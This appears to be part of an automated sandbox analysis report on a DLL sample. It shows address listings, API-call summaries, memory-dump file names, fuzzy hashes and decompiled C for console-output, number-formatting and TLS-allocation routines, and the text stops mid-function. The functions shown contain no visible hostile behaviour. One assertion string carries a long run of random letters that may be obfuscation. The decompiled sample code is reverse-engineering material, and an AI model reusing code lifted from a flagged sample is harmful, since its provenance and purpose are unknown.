                          0x6f2541e6
                          0x6f2541e7
                          0x6f2541ee
                          0x6f2541f4
                          0x6f2541fc
                          0x6f254207
                          0x6f25420c
                          0x6f254217
                          0x6f25421c
                          0x6f254222
                          0x6f25422b
                          0x6f254285
                          0x6f254285
                          0x6f254310
                          0x6f254315
                          0x6f254327
                          0x6f25432c
                          0x6f25432f
                          0x6f254334
                          0x6f25434f
                          0x6f254432
                          0x6f254438
                          0x6f254355
                          0x6f254355
                          0x6f254360
                          0x6f254362
                          0x6f254365
                          0x6f25436e
                          0x6f254378
                          0x00000000
                          0x6f25437a
                          0x6f25437c
                          0x6f25437e
                          0x6f254397
                          0x00000000
                          0x6f25439d
                          0x6f2543a1
                          0x6f2543a7
                          0x6f2543aa
                          0x6f2543b0
                          0x6f2543b3
                          0x00000000
                          0x6f2543b3
                          0x6f2543a1
                          0x6f254397
                          0x6f254378
                          0x6f25436e
                          0x6f25434f
                          0x6f254334
                          0x6f254222
                          0x6f25419d
                          0x6f254173
                          0x00000000
                          0x6f2543b6
                          0x6f2543b6
                          0x6f2543bf
                          0x6f25443a
                          0x6f25443f
                          0x6f254447
                          0x6f254448
                          0x6f254449
                          0x6f254455
                          0x00000000

                          APIs
                          • GetConsoleOutputCP.KERNEL32(219C2278,?,00000000,?), ref: 6F2540EC
                            • Part of subcall function 6F2519B3: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,6F253B22,?,00000000,-00000008), ref: 6F251A5F
                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 6F254347
                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6F25438F
                          • GetLastError.KERNEL32 ref: 6F254432
                          Memory Dump Source
                          • Source File: 00000004.00000002.641042475.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000004.00000002.641004987.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641140882.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641221834.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641232429.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641246076.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                          • String ID:
                          • API String ID: 2112829910-0
                          • Opcode ID: 88decbd1379b921d07a4b2aa8708e4a733e9f167bc960ea91f7d3518ac044982
                          • Instruction ID: a8ad5f7de2f81d2020e7237cc43316fb6dcd6a538991aae0bf5410161c97a9be
                          • Opcode Fuzzy Hash: 88decbd1379b921d07a4b2aa8708e4a733e9f167bc960ea91f7d3518ac044982
                          • Instruction Fuzzy Hash: 3ED157B5D04258AFCF05CFA8C890AADFBB5FF09314F14812AE865EB651D730A966CF50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F242620, Relevance: 6.2, APIs: 4, Instructions: 215COMMON
                          Download Yara Rule
                          C-Code - Quality: 56%
                          			E6F242620(void* __ebx, long __ecx, void* __edx, void* __edi, void* __esi, signed char _a1, char _a2, char _a8, signed int _a8212, void* _a8216, char _a1864873500) {
				signed int _v0;
				char _v2;
				void* _v4;
				long _v8;
				long _v12;
				signed char* _v16;
				long _v20;
				intOrPtr _v28;
				char _v36;
				char _v40;
				long _v44;
				char* _v48;
				char _v52;
				intOrPtr _v56;
				char _v60;
				long _v64;
				char* _v68;
				long _v76;
				long _v80;
				char _v84;
				long _v88;
				intOrPtr _v92;
				long _v100;
				long _v104;
				char _v108;
				intOrPtr _v188;
				intOrPtr _v192;
				char _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				void* __ebp;
				signed short* _t120;
				signed char _t122;
				void** _t124;
				void* _t129;
				void* _t135;
				void* _t139;
				void* _t140;
				intOrPtr _t141;
				void* _t146;
				void* _t147;
				long _t156;
				signed short _t161;
				void* _t164;
				signed int _t167;
				signed int _t168;
				signed int _t172;
				signed int _t173;
				DWORD* _t177;
				unsigned int _t178;
				void* _t180;
				unsigned int _t182;
				void* _t183;
				signed char _t185;
				signed int _t186;
				void* _t192;
				long _t193;
				signed int _t196;
				void** _t197;
				void* _t205;
				DWORD* _t206;
				signed char _t208;
				signed int _t212;
				signed short _t215;
				long* _t219;
				long _t221;
				long _t226;
				signed char _t228;
				intOrPtr _t236;
				signed int _t237;
				signed short _t238;
				void* _t245;
				void* _t247;
				signed int _t249;
				signed int _t250;
				unsigned int _t253;
				signed int _t256;
				void* _t258;
				long _t259;
				char* _t260;
				void* _t261;
				char* _t264;
				void* _t271;
				void* _t272;
				void** _t273;
				void* _t276;
				signed short _t277;
				signed int _t281;
				signed int _t282;
				signed int _t284;
				signed int _t288;
				void* _t289;
				void* _t290;
				signed int _t296;
				void* _t301;
				void* _t302;
				void* _t303;
				void* _t304;
				void* _t306;
				void* _t307;
				intOrPtr _t308;
				void* _t319;

				_push(__ebx);
				_push(__edi);
				_push(__esi);
				E6F24A000(0x2010);
				_t258 = _a8216;
				_t288 = _a8212;
				_t271 =  &_v0;
				_v4 = __edx;
				_v8 = __ecx;
				E6F24C310(_t258, _t271, 0, 0x2000);
				_t302 = _t301 + 0xc;
				_t177 = _t288 + _t258;
				_t192 = 0x2000;
				_t259 = 0;
				_v16 = _t177;
				if(0 == 0) {
					L4:
					__eflags = _t288 - _t177;
					if(_t288 == _t177) {
						L27:
						__eflags = _t259 - 0x1001;
						if(__eflags >= 0) {
							goto L46;
						} else {
							goto L28;
						}
					} else {
						_t185 = _v0;
						_t7 =  &_a1; // 0x1
						_t167 = _t7;
						_t249 = _t185 & 0x000000ff;
						__eflags = _t185;
						if(_t185 < 0) {
							_t281 = _v16;
							__eflags = _t167 - _t281;
							if(_t167 == _t281) {
								_t168 = 0;
								_t288 = _t281;
								_t250 = _t249 & 0x0000001f;
								__eflags = _t185 - 0xdf;
								if(_t185 > 0xdf) {
									goto L10;
								} else {
									goto L15;
								}
							} else {
								_t288 =  &_a2;
								_t168 = _a1 & 0x3f;
								_t250 = _t249 & 0x0000001f;
								__eflags = _t185 - 0xdf;
								if(_t185 <= 0xdf) {
									L15:
									_t256 = _t250 << 6;
									goto L18;
								} else {
									L10:
									_t282 = _v16;
									__eflags = _t288 - _t282;
									if(_t288 == _t282) {
										_t288 = _t282;
										_t168 = _t168 << 6;
										__eflags = _t185 - 0xf0;
										if(_t185 >= 0xf0) {
											goto L12;
										} else {
											goto L17;
										}
									} else {
										_t288 =  &_a1;
										_t168 = _t168 << 0x00000006 | _v0 & 0x3f;
										__eflags = _t185 - 0xf0;
										if(_t185 < 0xf0) {
											L17:
											_t256 = _t250 << 0xc;
											__eflags = _t256;
											L18:
											_t177 = _v16;
											_t249 = _t256 | _t168;
											_t271 =  &_v0;
											goto L21;
										} else {
											L12:
											_t284 = _v16;
											__eflags = _t288 - _t284;
											if(_t288 == _t284) {
												_t186 = 0;
												__eflags = 0;
												_t288 = _t284;
											} else {
												_t288 =  &_a1;
												_t186 = _v0 & 0x3f;
											}
											_t271 =  &_v0;
											_t172 = _t168 << 0x00000006 | (_t250 & 0x00000007) << 0x00000012 | _t186;
											_t177 = _v16;
											__eflags = _t172 - 0x110000;
											_t249 = _t172;
											if(_t172 == 0x110000) {
												goto L27;
											} else {
												L21:
												__eflags = _t249 - 0xffff;
												if(__eflags <= 0) {
													goto L2;
												} else {
													_t253 = _t249 + 0xffff0000;
													_t173 = _t253 & 0x000003ff | 0x0000dc00;
													_t249 = _t253 >> 0x0000000a | 0x0000d800;
													_t177 = _v16;
													__eflags = _t192;
													if(__eflags == 0) {
														goto L26;
													} else {
														goto L24;
													}
												}
											}
										}
									}
								}
							}
						} else {
							_t177 = _v16;
							_t288 = _t167;
							_t173 = 0;
							__eflags = _t192;
							if(__eflags != 0) {
								goto L24;
							} else {
								goto L26;
							}
						}
					}
				} else {
					L2:
					_t173 = 0;
					if(_t192 != 0) {
						L24:
						 *(_t302 + 0x10 + _t259 * 2) = _t249;
						_t259 = _t259 + 1;
						_t192 = _t192 + 0xfffffffe;
						_t249 = _t173;
						__eflags = _t249;
						if(__eflags != 0) {
							goto L2;
						} else {
							goto L4;
						}
					} else {
						L26:
						_t259 = 0x1000;
						L28:
						_t177 =  &_v12;
						_v12 = 0;
						if(WriteConsoleW(_v4, _t271, _t259, _t177, 0) == 0) {
							_t156 = GetLastError();
							_t219 = _v8;
							_t219[2] = _t156;
							_t219[1] = 0;
							 *_t219 = 1;
							goto L44;
						} else {
							_t288 = _v12;
							_t245 = _a8216;
							_t319 = _t288 - _t259;
							if(_t319 == 0) {
								L43:
								_t156 = _v8;
								 *((intOrPtr*)(_t156 + 4)) = _t245;
								 *_t156 = 0;
								L44:
								return _t156;
							} else {
								if(_t319 >= 0) {
									E6F256CA0(_t177, _t288, _t259, _t259, _t271, __eflags, 0x6f27e124);
									_t302 = _t302 + 4;
									asm("ud2");
									L46:
									_t193 = _t259;
									_t226 = 0x1000;
									_push(0x6f27e114);
									goto L48;
								} else {
									if((( *(_t302 + 0x10 + _t288 * 2) & 0x0000ffff) + 0x00002312 & 0x0000ffff) < 0x312) {
										_t164 = _t302 + 0x10 + _t288 * 2;
										_t288 =  &_a1;
										_v12 = 0;
										if(WriteConsoleW(_v4, _t164, 1, _t177, 0) == 0) {
											GetLastError();
										}
									}
									if(_t288 > _t259) {
										_t193 = _t288;
										_t226 = _t259;
										_push(0x6f27e134);
										L48:
										E6F256DB0(_t177, _t193, _t226, _t259, _t271, __eflags);
										_t303 = _t302 + 4;
										asm("ud2");
										asm("int3");
										_t304 = _t303 - 8;
										__eflags =  *_t193 - 1;
										if(__eflags == 0) {
											asm("movsd xmm0, [ecx+0x4]");
											asm("movsd [esp], xmm0");
											E6F256EE0(_t177, "called `Result::unwrap()` on an `Err` value", 0x2b, __eflags, _t304, 0x6f27d09c, 0x6f27e104);
											asm("ud2");
											asm("int3");
											asm("int3");
											asm("int3");
											_push(_t288);
											_push(_t177);
											_push(_t259);
											_push(_t271);
											_t306 = _t304 + 0xc - 0x80;
											_t228 =  *_v16;
											_t120 =  *_v20;
											__eflags = _t228 & 0x00000010;
											if((_t228 & 0x00000010) != 0) {
												_t196 =  *_t120;
												_t272 = 0;
												_t260 =  &_v40;
												_t289 = 0x30;
												_t178 = _t196;
												asm("o16 nop [eax+eax]");
												do {
													_t178 = _t178 >> 4;
													_t122 = _t196 & 0x0000000f;
													__eflags = _t122 - 0xa;
													_t230 =  <  ? 0x30 : 0x57;
													_t272 = _t272 + 1;
													_t231 = ( <  ? 0x30 : 0x57) + _t122;
													__eflags = _t196 - 0xf;
													_t196 = _t178;
													 *((char*)(_t260 - 1)) = ( <  ? 0x30 : 0x57) + _t122;
													_t260 = _t260 - 1;
												} while (__eflags > 0);
												goto L65;
											} else {
												__eflags = _t228 & 0x00000020;
												if((_t228 & 0x00000020) != 0) {
													_t237 =  *_t120;
													_t276 = 0;
													__eflags = 0;
													_t264 =  &_v40;
													_t289 = 0x30;
													_t182 = _t237;
													asm("o16 nop [cs:eax+eax]");
													do {
														_t182 = _t182 >> 4;
														_t208 = _t237 & 0x0000000f;
														__eflags = _t208 - 0xa;
														_t144 =  <  ? 0x30 : 0x37;
														_t276 = _t276 + 1;
														_t145 = ( <  ? 0x30 : 0x37) + _t208;
														__eflags = _t237 - 0xf;
														_t237 = _t182;
														 *((char*)(_t264 - 1)) = ( <  ? 0x30 : 0x37) + _t208;
														_t264 = _t264 - 1;
													} while (__eflags > 0);
													L65:
													_t124 = 0x80 - _t272;
													__eflags = 0x80 - 0x81;
													if(0x80 >= 0x81) {
														_t197 = _t124;
														E6F256D40(_t178, _t197, 0x80, _t260, _t272, 0x80 - 0x81, 0x6f27b60c);
														_t307 = _t306 + 4;
														asm("ud2");
														asm("int3");
														asm("int3");
														asm("int3");
														asm("int3");
														asm("int3");
														asm("int3");
														asm("int3");
														asm("int3");
														asm("int3");
														asm("int3");
														_t290 = _t307;
														_t308 = _t307 - 0x5c;
														_v200 = _t308;
														_v188 = 0xffffffff;
														_v192 = E6F243C10;
														_t273 = _t197;
														_v196 =  *[fs:0x0];
														 *[fs:0x0] =  &_v196;
														__imp__AcquireSRWLockExclusive(0x6f28adb4, _t272, _t260, _t178, _t289);
														_v204 = 0x6f28adb4;
														_t261 =  *_t273;
														__eflags = _t261;
														if(_t261 != 0) {
															L83:
															__imp__ReleaseSRWLockExclusive(_v36);
															 *[fs:0x0] = _v28;
															return _t261;
														} else {
															_t82 =  &(_t273[1]); // 0x6f243100
															_t180 =  *_t82;
															_t129 = TlsAlloc();
															__eflags = _t129 - 0xffffffff;
															if(__eflags == 0) {
																_v20 = 0;
																E6F256E20(_t180, "assertion failed: key != c::TLS_OUT_OF_INDEXESC:jbmojtgfautxqskitilrxgprrsoryhnjiexhvlejqbbtabuvcjbeqafloiohojnkwxtneumtjxczayjyebuempczgbfbrdwkmdkgjqjcnunttbmcxecyvhxsfpitjjwfpzkycxdjnqi", 0x2e, _t261, _t273, __eflags, 0x6f27de0c);
																_t308 = _t308 + 4;
																asm("ud2");
																goto L85;
															} else {
																_t261 = _t129;
																__eflags = _t180;
																if(_t180 == 0) {
																	L82:
																	__eflags = _t261;
																	 *_t273 = _t261;
																	if(__eflags == 0) {
																		L85:
																		_v108 = 0x6f27d74c;
																		_v104 = 1;
																		_v100 = 0;
																		_v92 = 0x6f27cd60;
																		_v84 = 0x6f27d5a4;
																		_v80 = 2;
																		_v40 = 0;
																		_v44 = 0;
																		_v88 = 0;
																		_v76 = 0;
																		_v20 = 0;
																		_v60 =  &_v108;
																		_v56 = E6F2322E0;
																		_v68 =  &_v60;
																		_v64 = 1;
																		_v52 = E6F23D2A0( &_v44, __eflags);
																		_v48 =  &_v84;
																		E6F23D460( &_v52);
																		asm("int 0x29");
																		asm("ud2");
																		goto L86;
																	} else {
																		goto L83;
																	}
																} else {
																	_t139 =  *0x6f28adc8;
																	__eflags = _t139;
																	if(_t139 != 0) {
																		L79:
																		_t140 = HeapAlloc(_t139, 0, 0xc);
																		__eflags = _t140;
																		if(__eflags == 0) {
																			goto L86;
																		} else {
																			 *_t140 = _t180;
																			 *(_t140 + 4) = _t261;
																			 *(_t140 + 8) = 0;
																			_t205 = _t140;
																			_t141 =  *0x6f28adcc; // 0x0
																			do {
																				 *((intOrPtr*)(_t205 + 8)) = _t141;
																				asm("lock cmpxchg [0x6f28adcc], ecx");
																			} while (__eflags != 0);
																			goto L82;
																		}
																	} else {
																		_t139 = GetProcessHeap();
																		__eflags = _t139;
																		if(__eflags == 0) {
																			L86:
																			_t135 = E6F256C30(_t180, 0xc, 4, _t261, _t273, __eflags);
																			asm("ud2");
																			_push(_t290);
																			__eflags =  &_a8;
																			return E6F23C870(_t135,  &_v36);
																		} else {
																			 *0x6f28adc8 = _t139;
																			goto L79;
																		}
																	}
																}
															}
														}
													} else {
														_t206 = _v16;
														_t236 = 0x6f27cc17;
														_push(_t272);
														_push(_t260);
														_push(2);
														goto L71;
													}
												} else {
													_t277 =  *_t120;
													_t146 = 0x27;
													__eflags = _t277 - 0x2710;
													if(_t277 < 0x2710) {
														_t238 = _t277;
														__eflags = _t238 - 0x63;
														if(_t238 > 0x63) {
															goto L57;
														} else {
															goto L58;
														}
														goto L87;
													} else {
														_t183 = 0x27;
														do {
															_t238 = _t277 * 0xd1b71759 >> 0x20 >> 0xd;
															_t215 = _t277 - _t238 * 0x2710;
															_t296 = ((_t215 & 0x0000ffff) >> 2) * 0x147b >> 0x11;
															_t50 = _t183 - 4; // 0x23
															_t146 = _t50;
															__eflags = _t277 - 0x5f5e0ff;
															_t277 = _t238;
															 *((short*)(_t306 + _t183 - 4)) =  *(_t296 +  &_a1864873500) & 0x0000ffff;
															 *((short*)(_t306 + _t183 - 2)) =  *((_t215 - _t296 * 0x00000064 & 0x0000ffff) + (_t215 - _t296 * 0x00000064 & 0x0000ffff) + 0x6f27b61c) & 0x0000ffff;
															_t183 = _t146;
														} while (__eflags > 0);
														__eflags = _t238 - 0x63;
														if(_t238 > 0x63) {
															L57:
															_t212 = ((_t238 & 0x0000ffff) >> 2) * 0x147b >> 0x11;
															 *((short*)(_t306 + _t146 - 2)) =  *((_t238 - _t212 * 0x00000064 & 0x0000ffff) + (_t238 - _t212 * 0x00000064 & 0x0000ffff) + 0x6f27b61c) & 0x0000ffff;
															_t146 = _t146 + 0xfffffffe;
															__eflags = _t146;
															_t238 = _t212;
														}
													}
													L58:
													__eflags = _t238 - 0xa;
													if(_t238 >= 0xa) {
														 *((short*)(_t306 + _t146 - 2)) =  *(_t238 + _t238 + 0x6f27b61c) & 0x0000ffff;
														_t147 = _t146 + 0xfffffffe;
														__eflags = _t147;
													} else {
														 *((char*)(_t306 + _t146 - 1)) = _t238 + 0x30;
														_t147 = _t146 - 1;
													}
													_t206 = _v16;
													_t236 = 0x6f27cd60;
													__eflags = 0x27;
													_push(0x27 - _t147);
													_push(_t306 + _t147);
													_push(0);
													L71:
													return E6F231AA0(_t206, _t236);
												}
											}
										} else {
											return  *((intOrPtr*)(_t193 + 4));
										}
									} else {
										if(_t288 == 0) {
											_t245 = 0;
											__eflags = 0;
										} else {
											_t247 = 0;
											do {
												_t161 =  *_t271 & 0x0000ffff;
												_t221 = 1;
												if(_t161 >= 0x80) {
													_t221 = 2;
													_t247 = _t245;
													if((_t161 & 0x0000ffff) > 0x7ff) {
														_t221 = (0 | (_t161 + 0x00002312 & 0x0000ffff) - 0x00000312 >= 0x00000000) + (0 | (_t161 + 0x00002312 & 0x0000ffff) - 0x00000312 >= 0x00000000) + 1;
													}
												}
												_t245 = _t247 + _t221;
												_t271 = _t271 + 2;
											} while ( &_v2 != 0);
										}
										goto L43;
									}
								}
							}
						}
					}
				}
				L87:
			}









































































































                          0x6f242621
                          0x6f242622
                          0x6f242623
                          0x6f242629
                          0x6f24262e
                          0x6f242635
                          0x6f24263c
                          0x6f242640
                          0x6f242644
                          0x6f242650
                          0x6f242655
                          0x6f242658
                          0x6f24265e
                          0x6f242663
                          0x6f242665
                          0x6f24266b
                          0x6f242680
                          0x6f242680
                          0x6f242682
                          0x6f242790
                          0x6f242790
                          0x6f242796
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6f242688
                          0x6f242688
                          0x6f24268b
                          0x6f24268b
                          0x6f24268e
                          0x6f242691
                          0x6f242693
                          0x6f2426a9
                          0x6f2426ac
                          0x6f2426ae
                          0x6f2426ec
                          0x6f2426ee
                          0x6f2426f0
                          0x6f2426f3
                          0x6f2426f6
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6f2426b0
                          0x6f2426b4
                          0x6f2426b7
                          0x6f2426ba
                          0x6f2426bd
                          0x6f2426c0
                          0x6f2426f8
                          0x6f2426f8
                          0x00000000
                          0x6f2426c2
                          0x6f2426c2
                          0x6f2426c2
                          0x6f2426c5
                          0x6f2426c7
                          0x6f2426fd
                          0x6f242704
                          0x6f242706
                          0x6f242709
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6f2426c9
                          0x6f2426cd
                          0x6f2426d4
                          0x6f2426d6
                          0x6f2426d9
                          0x6f24270b
                          0x6f24270b
                          0x6f24270b
                          0x6f24270e
                          0x6f24270e
                          0x6f242711
                          0x6f242713
                          0x00000000
                          0x6f2426db
                          0x6f2426db
                          0x6f2426db
                          0x6f2426de
                          0x6f2426e0
                          0x6f242719
                          0x6f242719
                          0x6f24271b
                          0x6f2426e2
                          0x6f2426e6
                          0x6f2426e7
                          0x6f2426e7
                          0x6f242723
                          0x6f24272c
                          0x6f24272e
                          0x6f242731
                          0x6f242736
                          0x6f242738
                          0x00000000
                          0x6f24273a
                          0x6f24273a
                          0x6f24273a
                          0x6f242740
                          0x00000000
                          0x6f242746
                          0x6f242746
                          0x6f242763
                          0x6f242765
                          0x6f242767
                          0x6f24276a
                          0x6f24276c
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6f24276c
                          0x6f242740
                          0x6f242738
                          0x6f2426d9
                          0x6f2426c7
                          0x6f2426c0
                          0x6f242695
                          0x6f242695
                          0x6f242698
                          0x6f24269a
                          0x6f24269c
                          0x6f24269e
                          0x00000000
                          0x6f2426a4
                          0x00000000
                          0x6f2426a4
                          0x6f24269e
                          0x6f242693
                          0x6f242670
                          0x6f242670
                          0x6f242670
                          0x6f242674
                          0x6f242770
                          0x6f242770
                          0x6f242775
                          0x6f242776
                          0x6f242779
                          0x6f24277b
                          0x6f24277e
                          0x00000000
                          0x6f242784
                          0x00000000
                          0x6f242784
                          0x6f24267a
                          0x6f242789
                          0x6f242789
                          0x6f24279c
                          0x6f24279c
                          0x6f2427a0
                          0x6f2427b9
                          0x6f242875
                          0x6f24287b
                          0x6f24287f
                          0x6f242882
                          0x6f242889
                          0x00000000
                          0x6f2427bf
                          0x6f2427bf
                          0x6f2427c3
                          0x6f2427ca
                          0x6f2427cc
                          0x6f242893
                          0x6f242893
                          0x6f242897
                          0x6f24289a
                          0x6f2428a0
                          0x6f2428aa
                          0x6f2427d2
                          0x6f2427d2
                          0x6f2428b4
                          0x6f2428b9
                          0x6f2428bc
                          0x6f2428be
                          0x6f2428be
                          0x6f2428c0
                          0x6f2428c5
                          0x00000000
                          0x6f2427d8
                          0x6f2427ea
                          0x6f2427ec
                          0x6f2427f0
                          0x6f2427f1
                          0x6f24280b
                          0x6f24280d
                          0x6f24280d
                          0x6f24280b
                          0x6f242815
                          0x6f2428cc
                          0x6f2428ce
                          0x6f2428d0
                          0x6f2428d5
                          0x6f2428d5
                          0x6f2428da
                          0x6f2428dd
                          0x6f2428df
                          0x6f2428e0
                          0x6f2428e3
                          0x6f2428e6
                          0x6f2428f2
                          0x6f242903
                          0x6f242913
                          0x6f24291b
                          0x6f24291d
                          0x6f24291e
                          0x6f24291f
                          0x6f242920
                          0x6f242921
                          0x6f242922
                          0x6f242923
                          0x6f242924
                          0x6f242938
                          0x6f24293a
                          0x6f24293c
                          0x6f24293f
                          0x6f242a05
                          0x6f242a07
                          0x6f242a09
                          0x6f242a10
                          0x6f242a15
                          0x6f242a17
                          0x6f242a20
                          0x6f242a22
                          0x6f242a2a
                          0x6f242a2c
                          0x6f242a2e
                          0x6f242a31
                          0x6f242a32
                          0x6f242a34
                          0x6f242a37
                          0x6f242a39
                          0x6f242a3c
                          0x6f242a3c
                          0x00000000
                          0x6f242945
                          0x6f242945
                          0x6f242948
                          0x6f242a43
                          0x6f242a45
                          0x6f242a45
                          0x6f242a47
                          0x6f242a4e
                          0x6f242a53
                          0x6f242a55
                          0x6f242a60
                          0x6f242a62
                          0x6f242a6a
                          0x6f242a6d
                          0x6f242a70
                          0x6f242a73
                          0x6f242a74
                          0x6f242a76
                          0x6f242a79
                          0x6f242a7b
                          0x6f242a7e
                          0x6f242a7e
                          0x6f242a83
                          0x6f242a88
                          0x6f242a8a
                          0x6f242a8f
                          0x6f242af0
                          0x6f242afc
                          0x6f242b01
                          0x6f242b04
                          0x6f242b06
                          0x6f242b07
                          0x6f242b08
                          0x6f242b09
                          0x6f242b0a
                          0x6f242b0b
                          0x6f242b0c
                          0x6f242b0d
                          0x6f242b0e
                          0x6f242b0f
                          0x6f242b11
                          0x6f242b16
                          0x6f242b19
                          0x6f242b1c
                          0x6f242b23
                          0x6f242b2a
                          0x6f242b36
                          0x6f242b39
                          0x6f242b44
                          0x6f242b4a
                          0x6f242b51
                          0x6f242b53
                          0x6f242b55
                          0x6f242bc5
                          0x6f242bc8
                          0x6f242bd1
                          0x6f242be0
                          0x6f242b57
                          0x6f242b57
                          0x6f242b57
                          0x6f242b5a
                          0x6f242b60
                          0x6f242b63
                          0x6f242be1
                          0x6f242bf7
                          0x6f242bfc
                          0x6f242bff
                          0x00000000
                          0x6f242b65
                          0x6f242b65
                          0x6f242b67
                          0x6f242b69
                          0x6f242bbd
                          0x6f242bbf
                          0x6f242bc1
                          0x6f242bc3
                          0x6f242c01
                          0x6f242c0a
                          0x6f242c11
                          0x6f242c18
                          0x6f242c1f
                          0x6f242c26
                          0x6f242c2d
                          0x6f242c34
                          0x6f242c38
                          0x6f242c3f
                          0x6f242c46
                          0x6f242c4d
                          0x6f242c54
                          0x6f242c5a
                          0x6f242c61
                          0x6f242c64
                          0x6f242c73
                          0x6f242c76
                          0x6f242c79
                          0x6f242c83
                          0x6f242c85
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6f242b6b
                          0x6f242b6b
                          0x6f242b70
                          0x6f242b72
                          0x6f242b86
                          0x6f242b8b
                          0x6f242b90
                          0x6f242b92
                          0x00000000
                          0x6f242b98
                          0x6f242b98
                          0x6f242b9a
                          0x6f242b9d
                          0x6f242ba4
                          0x6f242ba6
                          0x6f242bb0
                          0x6f242bb0
                          0x6f242bb3
                          0x6f242bb3
                          0x00000000
                          0x6f242bb0
                          0x6f242b74
                          0x6f242b74
                          0x6f242b79
                          0x6f242b7b
                          0x6f242c87
                          0x6f242c91
                          0x6f242c96
                          0x6f242ca0
                          0x6f242ca4
                          0x6f242cb3
                          0x6f242b81
                          0x6f242b81
                          0x00000000
                          0x6f242b81
                          0x6f242b7b
                          0x6f242b72
                          0x6f242b69
                          0x6f242b63
                          0x6f242a91
                          0x6f242a91
                          0x6f242a98
                          0x6f242a9d
                          0x6f242a9e
                          0x6f242a9f
                          0x00000000
                          0x6f242a9f
                          0x6f24294e
                          0x6f24294e
                          0x6f242950
                          0x6f242955
                          0x6f24295b
                          0x6f242aa3
                          0x6f242aa5
                          0x6f242aa8
                          0x00000000
                          0x6f242aae
                          0x00000000
                          0x6f242aae
                          0x00000000
                          0x6f242961
                          0x6f242961
                          0x6f242970
                          0x6f242976
                          0x6f24297f
                          0x6f24298d
                          0x6f24299d
                          0x6f24299d
                          0x6f2429a0
                          0x6f2429a6
                          0x6f2429b3
                          0x6f2429b8
                          0x6f2429bd
                          0x6f2429bd
                          0x6f2429c1
                          0x6f2429c4
                          0x6f2429c6
                          0x6f2429d2
                          0x6f2429e5
                          0x6f2429ea
                          0x6f2429ea
                          0x6f2429ed
                          0x6f2429ed
                          0x6f2429c4
                          0x6f2429ef
                          0x6f2429ef
                          0x6f2429f2
                          0x6f242abb
                          0x6f242ac0
                          0x6f242ac0
                          0x6f2429f8
                          0x6f2429fb
                          0x6f2429ff
                          0x6f2429ff
                          0x6f242ac3
                          0x6f242acf
                          0x6f242ad7
                          0x6f242ad9
                          0x6f242ada
                          0x6f242adb
                          0x6f242add
                          0x6f242aef
                          0x6f242aef
                          0x6f242948
                          0x6f2428e8
                          0x6f2428f1
                          0x6f2428f1
                          0x6f24281b
                          0x6f24281d
                          0x6f242891
                          0x6f242891
                          0x6f24281f
                          0x6f242821
                          0x6f24283a
                          0x6f24283a
                          0x6f24283d
                          0x6f242847
                          0x6f24284e
                          0x6f242859
                          0x6f24285b
                          0x6f24286f
                          0x6f24286f
                          0x6f24285b
                          0x6f242830
                          0x6f242832
                          0x6f242835
                          0x6f24283a
                          0x00000000
                          0x6f24281d
                          0x6f242815
                          0x6f2427d2
                          0x6f2427cc
                          0x6f2427b9
                          0x6f242674
                          0x00000000

                          APIs
                          • WriteConsoleW.KERNEL32(?,?,00000000,?,00000000,?,?,?), ref: 6F2427B1
                          • WriteConsoleW.KERNEL32(?,?,00000001,?,00000000,?,?,?), ref: 6F242803
                          • GetLastError.KERNEL32(?,?,?), ref: 6F24280D
                          • GetLastError.KERNEL32(?,?,?), ref: 6F242875
                          Memory Dump Source
                          • Source File: 00000004.00000002.641042475.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000004.00000002.641004987.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641140882.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641221834.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641232429.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641246076.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: ConsoleErrorLastWrite
                          • String ID:
                          • API String ID: 4006445483-0
                          • Opcode ID: e2dbf064c0cc1dda687c7131b77be32b0832b0bdc4b9d62cd9edae3ecddadc93
                          • Instruction ID: 5c6031847d7f28b3002674f7885f46cd95171fafdbe55c66e434fb1fc027344e
                          • Opcode Fuzzy Hash: e2dbf064c0cc1dda687c7131b77be32b0832b0bdc4b9d62cd9edae3ecddadc93
                          • Instruction Fuzzy Hash: 69616DB1A1871E8BE7198E66CC407AE7792EFC5315F04853AE494C73C4E6F5E8058F62
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F24CDDF, Relevance: 6.2, APIs: 4, Instructions: 168COMMON
                          Download Yara Rule
                          C-Code - Quality: 64%
                          			E6F24CDDF(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t52;
				signed int _t53;
				intOrPtr _t54;
				signed int _t58;
				signed int _t61;
				intOrPtr _t71;
				signed int _t75;
				signed int _t79;
				signed int _t81;
				signed int _t84;
				signed int _t85;
				signed int _t97;
				signed int* _t98;
				signed char* _t101;
				signed int _t107;
				void* _t111;

				_push(0x10);
				_push(0x6f287f40);
				E6F24AC90(__ebx, __edi, __esi);
				_t75 = 0;
				_t52 =  *(_t111 + 0x10);
				_t81 = _t52[1];
				if(_t81 == 0 ||  *((intOrPtr*)(_t81 + 8)) == 0) {
					L30:
					_t53 = 0;
					__eflags = 0;
					goto L31;
				} else {
					_t97 = _t52[2];
					if(_t97 != 0 ||  *_t52 < 0) {
						_t84 =  *_t52;
						_t107 =  *(_t111 + 0xc);
